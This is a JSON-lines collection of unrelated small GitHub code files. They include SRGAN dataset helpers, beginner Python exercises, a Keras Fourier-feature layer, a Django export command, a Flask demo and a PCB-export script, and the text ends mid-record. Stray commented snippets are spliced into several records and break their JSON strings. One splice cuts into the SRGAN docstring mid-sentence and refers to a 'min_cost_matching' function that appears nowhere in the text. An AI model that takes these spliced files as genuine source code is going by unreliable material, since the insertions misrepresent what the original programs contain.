{"seq_id":"24132039340","text":"\"\"\"\nHelper functions for loading and using datasets.\n\nAllows the main script to be launched directly by command line, or via an IDE\n\"\"\"\n\nimport glob\nimport random\nimport os\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nimport re  # Regex for path scrubbing\nimport pickle  # For load/save of random state\n\n# Normalization parameters for pre-trained PyTorch models\nmean = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\n\nclass ImageDataset(Dataset):  # Creates a map-style dataset\n    def __init__(self, root, hr_shape):\n        hr_height, hr_width = hr_shape\n        # Transforms for low resolution images and high resolution images\n        self.lr_transform = transforms.Compose(\n            [\n                transforms.Resize((hr_height // 4, hr_height // 4), Image.BICUBIC),\n                transforms.ToTensor(),\n                transforms.Normalize(mean, std),\n            ]\n        )\n        self.hr_transform = transforms.Compose(\n            [\n                transforms.Resize((hr_height, hr_height), Image.BICUBIC),\n                transforms.ToTensor(),\n                transforms.Normalize(mean, std),\n            ]\n        )\n\n        self.files = sorted(glob.glob(root + \"/*.*\"))\n\n    def __getitem__(self, index):\n        img = Image.open(self.files[index % len(self.files)])\n        img_lr = self.lr_transform(img)\n        img_hr = self.hr_transform(img)\n\n        return {\"lr\": img_lr, \"hr\": img_hr}\n\n    def __len__(self):\n        return len(self.files)\n\n\n\nclass ImageLoader(Dataset):  # Creates a map-style dataset\n    def __init__(self, root):\n\n        self.identityTransform = transforms.Compose(\n            [ \n                transforms.ToTensor(),\n                transforms.Normalize(mean, std)\n            ])\n\n        self.files = sorted(glob.glob(root + \"/*.*\"))\n\n    def __getitem__(self, index):\n        img = Image.open(self.files[index % len(self.files)])\n\n        img = self.identityTransform(img)\n\n        return {\"img\": img}\n\n\n    def __len__(self):\n        return len(self.files)\n\n\ndef GetDataPath(dataset_name):\n    \"\"\"\n    Helper function: Allow launching of the script from the project root directory (ie. 
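# A tiny worked example of the gated assignment used in min_cost_matching above;
# hedged: the cost matrix is made up. With extend_cost=True and a cost_limit,
# lap.lapjv leaves pairs whose cost exceeds the limit unassigned (index -1).
import numpy as np
import lap

cost = np.array([[0.2, 0.9],
                 [0.8, 0.3]])
_, row_to_col, col_to_row = lap.lapjv(cost, extend_cost=True, cost_limit=0.5)
print(row_to_col)  # [0 1] -- each track matched to its cheap detection
print(col_to_row)  # [0 1]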
within an IDE)\n\n Returns ../../data/DATASET_NAME, or ./data/DATASET_NAME, as appropriate\n \"\"\"\n # Try from the implementation directory:\n dataPath = \"../../data/%s\" % dataset_name\n if not os.path.isdir(dataPath):\n # Try from the project root:\n dataPath = \"./data/%s\" % dataset_name\n if not os.path.isdir(dataPath):\n print(\"Error: Valid data path not found!\")\n\n return dataPath\n\n\ndef GetModelPath():\n \"\"\"\n Helper function: Get the relative /saved_models/ path\n\n Returns ../../saved_models/, or ./saved_models/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n modelPath = \"../../saved_models/\"\n if not os.path.isdir(modelPath):\n # Try from the project root:\n modelPath = \"./saved_models/\"\n if not os.path.isdir(modelPath):\n print(\"Error: Valid model path not found!\")\n\n return modelPath\n\n\ndef GetImagesPath():\n \"\"\"\n Helper function: Get the relative /images/ path\n\n Returns ../../images/, or ./images/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n imagesPath = \"../../images/\"\n if not os.path.isdir(imagesPath):\n # Try from the project root:\n imagesPath = \"./images/\"\n if not os.path.isdir(imagesPath):\n print(\"Error: Valid images path not found!\")\n\n return imagesPath\n\n\ndef GetArbitraryPath(thePath):\n \"\"\"\n Helper function: Get a relative arbitrary path\n\n Returns ../../thePath/, or ./thePath/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n arbitraryPath = \"../../\" + thePath + \"/\"\n if not os.path.isdir(arbitraryPath):\n # Try from the project root:\n arbitraryPath = \"./\" + thePath + \"/\"\n if not os.path.isdir(arbitraryPath):\n print(\"Error: Valid path not found!\")\n\n return arbitraryPath\n\n\ndef GetHighestWeightIndex():\n \"\"\"\n Helper function: Get the index of the highest weights file in the /saved_models directory\n \"\"\"\n dataPath = GetModelPath()\n\n return GetHighestWeightIndexUsingPath(dataPath)\n\n\ndef GetHighestWeightIndexUsingPath(dataPath):\n \"\"\"\n Helper function: Get the index of the highest weights file in the /saved_models directory.\n\n For efficiency, use this function if you've already got a copy of the current /saved_models directory\n \"\"\"\n\n highestIndex = max([int(re.sub('[^0-9]','', f)) for f in os.listdir(dataPath)])\n\n return highestIndex\n\n\ndef GetModelDataPath(modelType, epoch = -1):\n \"\"\"\n Helper function: Get the correct relative path of the saved model weights/biases\n\n modelType = \"generator\" or \"discriminator\" (defaults to generator if errors occur)\n epoch = Specific epoch to load. 
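# What the highest-index scan above computes, on a made-up directory listing;
# hedged: fake_files stands in for os.listdir() on a real saved_models folder.
import re

fake_files = ["generator_3.pth", "generator_12.pth", "discriminator_12.pth"]
print(max(int(re.sub('[^0-9]', '', f)) for f in fake_files))  # 12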
Loads the max if no valid epoch is supplied\n    \"\"\"\n\n    dataPath = GetModelPath()\n    \n    # If no valid epoch is supplied, get the max:\n    if epoch < 0:\n        epoch = GetHighestWeightIndexUsingPath(dataPath)\n\n    dataName = \"generator_\" + str(epoch) + \".pth\"\n    if modelType == \"discriminator\":\n        dataName = \"discriminator_\" + str(epoch) + \".pth\"\n\n    finalPath = dataPath + dataName\n\n    print(\"Using saved model path: \\\"\" + finalPath + \"\\\"\")\n\n    return finalPath\n\n\ndef LoadRandomState(stateNum):\n    \"\"\"\n    Loads a previous random state from the saved_models directory\n    \"\"\"\n    print(\"Loading random state\")\n\n    filename = 'rngState_' + str(stateNum) + '.pth'\n\n    try:\n        randomStates = pickle.load( open(GetModelPath() + filename, \"rb\") )\n\n        random.setstate(randomStates[\"pythonRandom\"])\n        torch.set_rng_state(randomStates[\"torchRandom\"])\n        torch.cuda.set_rng_state(randomStates[\"torchCudaRandom\"])\n        np.random.set_state(randomStates[\"numpyRandom\"])\n\n    except:\n        print(\"ERROR: Failed to load random state!\")\n\n\ndef SaveRandomState(stateNum):\n    \"\"\"\n    Save a random state checkpoint\n    \"\"\"\n    randomStates = {\n        \"pythonRandom\" : random.getstate(), \n        \"torchRandom\" : torch.get_rng_state(),\n        \"torchCudaRandom\" : torch.cuda.get_rng_state(),\n        \"numpyRandom\" : np.random.get_state()\n    }\n\n    filename = 'rngState_' + str(stateNum) + '.pth'\n\n    savePath = GetModelPath() + filename\n\n    pickle.dump(randomStates, open(savePath, \"wb\"))\n\n\ndef LoadTrainingTime(stateNum):\n    \"\"\"\n    Load the number of seconds spent training\n    \"\"\"\n\n    filename = 'time_' + str(stateNum) + '.pth'\n\n    try:\n        timeVals = pickle.load( open(GetModelPath() + filename, \"rb\"))\n        return timeVals[\"trainingTime\"]\n\n    except:\n        print(\"ERROR: Failed to load training times! Returning 0\")\n        return 0\n\n\ndef SaveTrainingTime(stateNum, seconds):\n    \"\"\"\n    Save the number of seconds spent training\n    \"\"\"\n    times = {\n        \"trainingTime\" : seconds\n    }\n\n    filename = 'time_' + str(stateNum) + '.pth'\n    savePath = GetModelPath() + filename\n\n    pickle.dump(times, open(savePath, \"wb\"))","repo_name":"b1skit/PyTorch-GAN","sub_path":"implementation/srgan/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"9883727980","text":"#Assignment 3, Question 2\r\n#Author: Sabir Buxsoo\r\n#Class: CSC1015F 2014\r\n#Date Created: 27/03/2014\r\n\r\n#This program is used to create a triangular shape based on the user input for the height of the triangle.\r\n\r\n#Defining the function triangle() to create the pattern.\r\ndef triangle():\r\n    #Pre-condition: Input height of the Triangle.\r\n    #Post-condition: Generate triangular pattern.\r\n    heightOfTriangle = int(input(\"Enter the height of the triangle:\\n\"))\r\n    spaceAlignment = heightOfTriangle - 1 #Initializing the spacing for the first row.\r\n    starAlignment = 1 #Initializing the number of * for the first row == 1.\r\n    \r\n    #Pre-condition: Make first row with spacing equal to number of rows - 1, followed by 1 star and again followed by the same spacing.\r\n    #Post-condition: Iterate through heightOfTriangle for each row, decreasing the spacing by subtracting 1 for each row and increasing the number of stars by adding 2 for each row.\r\n    for i in range(heightOfTriangle):\r\n        print((\" \" * spaceAlignment) + (\"*\" * starAlignment) + (\" \" * spaceAlignment))\r\n        spaceAlignment -= 1 #Space should decrease by 1.\r\n        starAlignment += 2 #Number of stars should increase by 2.\r\n\r\ntriangle()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/bxsmuh001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"41973044792","text":"# Removes the first letter of a given word and adds it to the end of the word with 'ay' at the end.\n\npyg = 'ay'\n\noriginal = input('Enter a word:')\n\nif len(original) > 0 and original.isalpha():\n    word = original.lower()\n    first = word[0]\n    new_word = word + first + pyg\n    new_word = new_word[1:len(new_word)]\n    print(new_word)\nelse:\n    print('empty')","repo_name":"afam-io/py_learnings","sub_path":"codeacademy/basics/pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"38286297482","text":"import copy\n# Custom deepcopy function\ndef deepcopy(data):\n    # The new list being built\n    listdata = []\n    for i in data:\n        # If i is a dict, delegate to the dict handler copydict()\n        if isinstance(i,dict):\n            dictdata = copydict(i)\n            listdata.append(dictdata)\n        # For tuples and lists, recurse with deepcopy()\n        elif isinstance(i,list) or isinstance(i,tuple):\n            listdata1 = deepcopy(i)\n            listdata.append(listdata1)\n        # Any other (immutable) value is appended to listdata as-is\n        else:\n            listdata.append(i)\n    return listdata\n\n# Handler for dict values\ndef copydict(data): \n    dict1 = {}\n    # Walk the dictionary\n    for keys,values in data.items():\n        # Each step below mirrors the logic in deepcopy\n        if isinstance(values,dict):\n            numdict=copydict(values)\n            dict1[keys]=numdict\n        elif isinstance(values,list) or isinstance(values,tuple):\n            dict1[keys] = deepcopy(values)\n        else:\n            dict1[keys] = values\n    return dict1\nif __name__ == '__main__':\n    
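# A quick sanity check of the hand-rolled deepcopy above; hedged: illustrative
# data only, and note that this implementation returns tuples as lists.
nested = [1, {'k': [2, 3]}, (4, 5)]
cloned = deepcopy(nested)
cloned[1]['k'].append(99)
print(nested[1]['k'])  # [2, 3] -- the original is untouched
print(cloned)          # [1, {'k': [2, 3, 99]}, [4, 5]]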
print({'123':123})","repo_name":"yintiannong/98kar","sub_path":"part1/crazy.py","file_name":"crazy.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"3586056061","text":"# 2023/03/01 Baek 4659\n\nmoum = [\"a\", \"e\", \"i\", \"o\", \"u\"]\ndef check_pwd(candidate_pwd):\n    moum_cnt = 0\n    before = \"\"\n    before_moum = 0\n    before_jaum = 0\n\n    for i in candidate_pwd:\n        if i in moum:\n            moum_cnt += 1\n            before_moum += 1\n            before_jaum = 0\n        else:\n            before_moum = 0\n            before_jaum += 1\n\n        if before_moum >= 3 or before_jaum >= 3:\n            return False\n\n        if before != i:\n            before = i\n        else:\n            if before not in [\"e\", \"o\"]:\n                return False\n        \n    if moum_cnt == 0:\n        return False\n\n    return True\n    \n\nwhile True:\n    candidate_pwd = input()\n    if candidate_pwd == \"end\":\n        break\n    if check_pwd(candidate_pwd):\n        print(\"<{}> is acceptable.\".format(candidate_pwd))\n    else:\n        print(\"<{}> is not acceptable.\".format(candidate_pwd))","repo_name":"kkw2758/Algorithm","sub_path":"구현/baek_4659.py","file_name":"baek_4659.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"72704483639","text":"# class for tf.keras Fourier features layer\nimport tensorflow as tf\n\nclass ffLayer(tf.keras.layers.Layer):\n    \"\"\"\n    Tensorflow keras Layer for Fourier feature extraction\n\n    Attributes\n    ----------\n    input_dim : int, default 10\n        Dimensionality of the layer input.\n    m : int, default 100\n        Number of random Fourier features drawn per standard deviation.\n    sig : array_like, optional\n        Array of standard deviations for each matrix.\n    B_matrices : array_like\n        Array of the randomly sampled values for the feature extraction\n        layer. Its shape is `(input_dim, m*len(sig))`.\n        Each submatrix of shape `(input_dim, m)` has values taken from\n        a zero-mean Gaussian distribution with standard deviation of the\n        corresponding `sig`.\n\n    Notes\n    ---------\n    Only has non-trainable parameters. Each matrix is built from `m` samples\n    of a zero-mean Gaussian whose standard deviation is the corresponding\n    entry of `sig`.\n    \"\"\"\n\n    def __init__(self, input_dim=10, m=100, sig=None, B_matrices=None, **kwargs):\n        \"\"\"\n        Parameters\n        ----------\n        input_dim : int, default 10\n            Dimensionality of the layer input.\n        m : int, default 100\n            Number of random Fourier features drawn per standard deviation.\n        sig : array_like, optional\n            Array of standard deviations for each matrix.\n        B_matrices : array_like\n            Array of the randomly sampled values for the feature extraction\n            layer. Its shape is `(input_dim, m*len(sig))`.\n            Each submatrix of shape `(input_dim, m)` has values taken from\n            a zero-mean Gaussian distribution with standard deviation of the\n            corresponding `sig`.\n        \"\"\"\n        super(ffLayer, self).__init__(**kwargs)\n        self.input_dim = input_dim\n        self.m = m\n        if sig is None:\n            self.sig = [1, 10, 20, 50, 100]\n        else:\n            self.sig = sig\n        if B_matrices is None:\n            self.B_matrices = []\n            tf_rng = tf.random.Generator.from_non_deterministic_state()\n            for sigi in self.sig:\n                self.B_matrices.append(tf_rng.normal(shape=(self.input_dim, self.m),\n                                                     mean=0.0, stddev=sigi))\n            self.B_matrices = tf.constant(tf.concat(self.B_matrices, 1))\n        else:\n            self.B_matrices = tf.constant(B_matrices)\n\n    def call(self, inputs, *args, **kwargs):\n        inp_n_rows = tf.shape(inputs)[0]\n        inputs_x_B = tf.matmul(inputs, self.B_matrices)\n        # return tf.concat([tf.cos(inputs_x_B), tf.sin(inputs_x_B)], 1)\n        aux = tf.concat([tf.cos(inputs_x_B), tf.sin(inputs_x_B)], 0)\n        return tf.transpose(tf.reshape(tf.transpose(aux), [self.m*len(self.sig)*2, inp_n_rows]))\n\n    def get_config(self):\n        config = super(ffLayer, self).get_config()\n        config.update({\"input_dim\": self.input_dim, \"m\": self.m,\n                       \"sig\": self.sig, \"B_matrices\": self.B_matrices.numpy()})\n        return config\n\n","repo_name":"bva99/PINN-KS","sub_path":"lib/fflayer.py","file_name":"fflayer.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"20010588209","text":"from optparse import make_option\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom op_associazione.models import Associate, Membership\n\nclass Command(BaseCommand):\n    help = 'Export all subscribers, ever, paying or not'\n\n    option_list = BaseCommand.option_list + (\n        make_option('--active',\n            action='store_true',\n            dest='active',\n            default=False,\n            help='Export only active subscribers'),\n        )\n\n    def handle(self, *args, **options):\n        \"\"\"\n        Extracts subscribers in CSV format\n        \"\"\"\n\n        if options['active']:\n            subscribers = [m.associate for m in Membership.objects.filter(is_active=True)]\n        else:\n            subscribers = Associate.objects.all()\n        \n        print('nome;cognome;email;location')\n        for s in subscribers:\n            print((u'%s;%s;%s;%s' % \n                (s.first_name, s.last_name, s.email, s.location,)).encode('utf-8'))\n        \n","repo_name":"openpolis/op_associazione","sub_path":"management/commands/exportsubscribers.py","file_name":"exportsubscribers.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
{"seq_id":"10587832784","text":"import sys\n\nusage = \"usage: %prog inputfile\"\nversion = '%prog 20170219.1'\n\nfh = open(sys.argv[1])\nfh_out = open(sys.argv[1].split('.')[0] + '_fas.fa', 'w')\n\nfor line in fh:\n\tif line.startswith('bacteria.'):\n\t\tfh_out.write(line.split(':\\t')[1])\n\telse:\n\t\tfh_out.write(line)\n\nfh.close()\nfh_out.close()\n","repo_name":"fanhuan/script","sub_path":"removefilenames.py","file_name":"removefilenames.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
{"seq_id":"9635513610","text":"# In this problem, the condition below means you can never move backwards, so no visited list is needed.\n# 'You may only move to a higher cell among the cells above, below, left, or right.'\n\ndef DFS(x, y):\n    global cnt\n    if x == max_x and y == max_y:\n        cnt += 1\n    else:\n        for dx, dy in direction:\n            nx, ny = x + dx, y + dy\n            if 0 <= nx < n and 0 <= ny < n and grid[x][y] < grid[nx][ny]:\n                DFS(nx, ny)\n\nif __name__ == '__main__':\n    n = int(input())\n    grid = [list(map(int, input().split())) for _ in range(n)]\n    min_value = 2147000000\n    max_value = -2147000000\n    for i in range(n):\n        for j in range(n):\n            if grid[i][j] < min_value:\n                min_value = grid[i][j]\n                min_x = i\n                min_y = j\n            if grid[i][j] > max_value:\n                max_value = grid[i][j]\n                max_x = i\n                max_y = j\n    cnt = 0\n    direction = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n    DFS(min_x, min_y)\n    print(cnt)","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/basic/section7/등산경로_DFS.py","file_name":"등산경로_DFS.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"16188848565","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\n\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch_ros.actions import Node\n\ndef generate_launch_description():\n\n    package_name = 'agri_robot_description'\n\n    display = IncludeLaunchDescription(\n                PythonLaunchDescriptionSource([os.path.join(\n                    get_package_share_directory(package_name),'launch','display.launch.py'\n                )]), launch_arguments={'use_sim_time': 'true'}.items()\n    )\n\n    gazebo = IncludeLaunchDescription(\n                PythonLaunchDescriptionSource([os.path.join(\n                    get_package_share_directory('gazebo_ros'), 'launch', 'gazebo.launch.py')]),\n             )\n    \n    spawn_entity = Node(package='gazebo_ros', executable='spawn_entity.py',\n                        arguments=['-topic', 'robot_description',\n                                   '-entity', 'agri_robot'],\n                        output='screen')\n    \n    return LaunchDescription([\n        display, \n        gazebo,\n        spawn_entity,\n    ])","repo_name":"BrandonAllan/weed_control_robot","sub_path":"agri_robot_description/launch/gazebo.launch.py","file_name":"gazebo.launch.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"26722103155","text":"from flask import Flask, abort, render_template, flash, session, redirect, url_for\nimport time\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'djfks'\n\n\"\"\"Custom template filter\"\"\"\n@app.template_filter('s_time')  # The decorator argument is the filter's registered name; it defaults to the function name.\ndef strf_time(timestamp):\n    return datetime.fromtimestamp(timestamp)\n# Centralized registration: positional arg 1 is the decorated function, positional arg 2 is the filter name.\n# app.add_template_filter(strf_time, 's_time')\n\n@app.route('/')\ndef index():\n    projects = [\n        {\"name\": \"project\", \"interface_num\": 11, \"create_time\": time.time()},\n        {\"name\": \"project\", \"interface_num\": 22, \"create_time\": time.time()},\n        {\"name\": \"project\", \"interface_num\": 33, \"create_time\": time.time()}\n    ]\n\n    flash('欢迎来到首页')  # flash() implements message flashing; note that app.config['SECRET_KEY'] must be configured.\n\n    # The **context of render_template: keyword arguments added here on the backend can be read directly in the template.\n    # Two ways to pass parameters when rendering: pass a single var='value' argument, or collect several parameters in a dict and unpack it with ** into keyword arguments.\n    return render_template('index.html', **{\"p\": projects,\n                                            \"title\": '模板渲染',\n                                            })  # return render_template('index.html', p = projects, title = '模板渲染')\n\n@app.route('/login/<username>')\ndef login(username):\n    session['user'] = username  # Use Flask's session to store data sent from the client.\n    return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n    
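# A quick check of the custom filter function itself; hedged: the timestamp is
# illustrative. In a Jinja template the filter is applied as
# {{ item.create_time | s_time }}.
import time
print(strf_time(time.time()))  # e.g. 2023-11-05 12:34:56.789012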
app.run(debug=True)\n","repo_name":"James-Bond-Liu/Flask_dev","sub_path":"模板引擎/过滤器/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"11065802748","text":"def trapping_water_problem(nums): \n    if len(nums)<3:\n        return 0\n\n    left_max=[0 for i in range(len(nums))]\n    right_max=[0 for i in range(len(nums))]\n\n    for i in range(1,len(nums)):\n        left_max[i]=max(left_max[i-1],nums[i-1])\n\n    for i in range(len(nums)-2,-1,-1):\n        right_max[i]=max(right_max[i+1],nums[i+1])\n\n    count=0\n\n    for i in range(1,len(nums)-1):\n        \n        if min(left_max[i],right_max[i])>nums[i]:\n            count+=min(left_max[i],right_max[i])-nums[i]\n        \n    return count\n\n\nprint(trapping_water_problem([0,1,0,2,1,0,1,3,2,1,2,1]))\nprint(trapping_water_problem([4,2,0,3,2,5]))","repo_name":"krishnahansalia/Data-Structure","sub_path":"trapping_water_problem.py","file_name":"trapping_water_problem.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"4043272606","text":"# python altium2jlcpcb.py\n\n# instructions:\n# - Use altium outputjob\n# - Copy script into \"project outputs\" folder. Where gerber files are\n# execute py script: \"python altium2jlcpcb.py\" or run altium2pcb.bat in windows\n\n# requisites:\n# pip install pyexcel pyexcel-xlsx\n\n# # Manual work without altium outputjob\n#-(with PCB open) File, fabrication, gerber\n#-(with PCB open) File, fabrication, nc drill\n#-(with PCB open) File, assembly, generates p&p\n\n# automated work:\n# # p&p \n#-remove first lines\n#-change \",\" for ;\n#-change \" for nothing\n#-change , for ;\n#-change TopLayer for Top\n#-change BottomLayer for Bottom\n#-change Center-X(mm) for Mid X\n#-change Center-Y(mm) for Mid Y\n# # bom\n#-change \",\" for ;\n#-change \" for nothing\n#-change LCSC for JLCPCB Part #\n# # save to XLS\n\nfrom zipfile import ZipFile\nimport pandas as pd\nimport glob\nimport os\nimport shutil\n\ncwd = os.getcwd()\n\ndef addtozip(extensionarray):\n    for extension in extensionarray:\n        print('reading extension: ',extension)\n        myextension='*.'+extension\n        namearray=glob.glob(myextension)\n        for name in namearray:\n            zipObj.write(name)\n\n\nprint('running altium2jlcpcb script')\nprint('found files: ')\nprint(glob.glob('*.GBL'))\n\nzipObj = ZipFile('gerber.zip', 'w')\naddtozip([\"GBL\",\"GBO\",\"GBP\",\"GBS\",\"GKO\",\"GTL\",\"GTO\",\"GTP\",\"GTS\"])\n\n\nzipObj.close()\n\n#################################################\n# replace in BOM\n\n# Read in the file\nwith open('BOM.csv', 'r') as file :\n    filedata = file.read()\n\n# Replace the target string\n#filedata = filedata.replace('\",\"', ';')\n#filedata = filedata.replace('\"', '')\nfiledata = filedata.replace('LCSC', 'JLCPCB Part #')\n\n# Write the file out again\nwith open('BOM.csv', 'w') as file:\n    file.write(filedata)\n\n#################################################\n# replace in PP\n\n# Read in the file\nwith open('PP.csv', 'r') as file :\n    filedata = file.read()\n\n# Replace the target string\n#filedata = filedata.replace('\",\"', ';')\n#filedata = filedata.replace('\"', '')\nfiledata = filedata.replace('TopLayer', 'Top')\nfiledata = filedata.replace('BottomLayer', 'Bottom')\nfiledata = filedata.replace('Center-X(mm)', 'Mid X')\nfiledata = filedata.replace('Center-Y(mm)', 'Mid Y')\n\n# Write the file out again\nwith open('PP.csv', 'w') as file:\n    file.write(filedata)\n\n\nwith open(\"PP.csv\", \"r+\") as file:\n    first_line = file.readline().rstrip()\n\nif first_line==\"Altium Designer Pick and Place Locations\":\n    print(\"CAUTION, BAD CSV. Trying to fix\")\n    with open(\"PP.csv\", \"r+\") as file:\n        all_lines = file.readlines()\n        # move file pointer to the beginning of a file\n        file.seek(0)\n        # truncate the file\n        file.truncate()\n        # start writing lines except the first line\n        file.writelines(all_lines[12:])\nelse:\n\n    print(\"CSV is OK. First line: '\",first_line,\"'\")\n\nread_file = pd.read_csv ('BOM.csv')\nread_file.to_excel ('BOM.xlsx', index = None, header=True)\n\n#remove manually first non csv text...\nread_file = pd.read_csv ('PP.csv')\nread_file.to_excel ('PP.xlsx', index = None, header=True)\n\npath = cwd+\"\\export\"\n\nif os.path.isdir('./export'):\n    for f in os.listdir(path):\n        os.remove(os.path.join(path, f))\n    os.rmdir(path)\n\nos.makedirs(path, exist_ok=False)\n\nos.rename(cwd+\"\\gerber.zip\", cwd+\"\\export\\gerber.zip\")\nos.rename(cwd+\"\\BOM.xlsx\", cwd+\"\\export\\BOM.xlsx\")\nos.rename(cwd+\"\\PP.xlsx\", cwd+\"\\export\\PP.xlsx\")","repo_name":"danirebollo/altium2jlcpcb","sub_path":"altium2jlcpcb.py","file_name":"altium2jlcpcb.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"29504227579","text":"def min_steps(src, dest, N):\n\n    # we are already at target position\n    if src == dest:\n        return 0\n\n    # initial position co-ordinates\n    x1 = src[0]\n    y1 = src[1]\n\n    # target position co-ordinates\n    x2 = dest[0]\n    y2 = dest[1]\n\n    # all possible moves for knight\n    next_moves = [(-2, -1), (-2, 1), (-1, 2), (1, 2),\n                  (2, 1), (2, -1), (1, -2), (-1, -2)]\n    \n    # array to keep track of knight, positions left to visit, and distance covered.\n    visited = [[0 for j in range(N)] for i in range(N)]\n\n    queue = []\n    queue.append((x1,y1))\n\n    while queue:\n        curr = queue.pop(0)\n        i = curr[0]\n        j = curr[1]\n        if i==x2 and j==y2:\n            return visited[x2][y2]\n\n\n        for k in next_moves:\n            if is_valid(i+k[0], j+k[1], visited, N):\n                visited[i+k[0]][j+k[1]] = visited[i][j] + 1\n                queue.append((i+k[0], j+k[1]))\n    return -1\n\n\ndef is_valid(i, j, vis, N):\n    return (i >= 0 and i < N and j >= 0 and j < N and vis[i][j] == 0)\n\n\nif __name__ == '__main__':\n    N = int(input(\"Enter no. 
of row in chess board (Counting start from 1) : \"))\n    print(\"\\nNOTE :- Enter x,y coordinates as space separated integers on same line.\")\n    print(\"\\tFirst cell is (0,0)\", \"Last cell is\",(N-1,N-1) )\n    knightpos = tuple(map(int,input(\"\\nEnter Knight's position : \").split()))\n    targetpos = tuple(map(int,input(\"Enter target position : \").split()))\n\n    print(\"\\nMinimum steps from\",knightpos,\"to\",targetpos,\" = \",min_steps(knightpos, targetpos, N))\n\n\n\n","repo_name":"LunaticPrakash/Data-Structure-And-Algorithms","sub_path":"Python/Graph/Min_Steps_for_dest_for_Knight_Chess.py","file_name":"Min_Steps_for_dest_for_Knight_Chess.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"4439205789","text":"from typing import List, Union\nfrom huggingface_hub import HfApi\n\ndef list_automodels(task_filter: Union[str,List[str]], hf_token: str = ''):\n    '''These can be run with just the model name and a prompt, no other inputs required.\n    All models & tasks publicly on the Hub (as of October, 2023)\n    Total models on Hub = 356,609\n    Total models with pipeline tags = 190,650 (53.5%)\n    {\n    'text-classification': 33353,\n    'reinforcement-learning': 29993,\n    'text-generation': 26479,\n    'text2text-generation': 18856,\n    'automatic-speech-recognition': 11458,\n    'token-classification': 11213,\n    'text-to-image': 10622,\n    'fill-mask': 8858,\n    'question-answering': 7278,\n    'image-classification': 6008,\n    'feature-extraction': 5706,\n    'audio-to-audio': 3592,\n    'translation': 2896,\n    'conversational': 2498,\n    'sentence-similarity': 2413,\n    'text-to-speech': 1651,\n    'summarization': 1337,\n    'audio-classification': 1320,\n    'object-detection': 897,\n    'unconditional-image-generation': 839,\n    'multiple-choice': 687,\n    'text-to-audio': 385,\n    'video-classification': 329,\n    'image-segmentation': 292,\n    'image-to-text': 283,\n    'tabular-classification': 252,\n    'image-to-image': 203,\n    'zero-shot-image-classification': 202,\n    'zero-shot-classification': 180,\n    'tabular-regression': 167,\n    'visual-question-answering': 82,\n    'table-question-answering': 77,\n    'depth-estimation': 74,\n    'document-question-answering': 70,\n    'text-to-video': 49,\n    'voice-activity-detection': 17,\n    'other': 12,\n    'graph-ml': 12,\n    'robotics': 9,\n    'time-series-forecasting': 1\n    }\n    '''\n    hf_api = HfApi(\n        endpoint=\"https://huggingface.co\", \n        token=hf_token,  # no token necessary; optionally let the user pass their own token to list private/gated models\n    )\n\n    if isinstance(task_filter, str):\n        task_filter = [task_filter]\n\n    for m in hf_api.list_models():\n        if m.pipeline_tag and m.pipeline_tag in task_filter:\n            yield m.id\n    \n    \n","repo_name":"KastanDay/llm-server","sub_path":"utils/list_models.py","file_name":"list_models.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"34745054985","text":"\nclass Agent():\n    \n    # Defined States in the Mission State Machine\n    def __init__(self,agentId, agentPos, agentHeading, taskID, taskStatus, agentBattery, agentPayload):\n        \"\"\"\n        ===========================================================\n        Constructor to create initial relevant Objects and global \n        Variables of Agent instance\n        ===========================================================\n        :Parameters: None\n        The Agents object is represented by a set of parameters:\n        - AgentID (uint32)\n        - AgentPosition 
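# Example invocation of the generator above; hedged: this needs network access
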